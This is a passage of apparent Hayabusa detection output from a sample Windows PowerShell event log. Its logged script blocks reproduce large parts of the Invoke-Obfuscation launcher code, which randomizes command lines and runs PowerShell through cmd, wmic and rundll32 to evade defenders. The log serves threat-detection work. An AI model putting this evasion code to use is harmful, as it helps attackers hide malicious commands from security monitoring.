$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. 
$CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. 
$ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. 
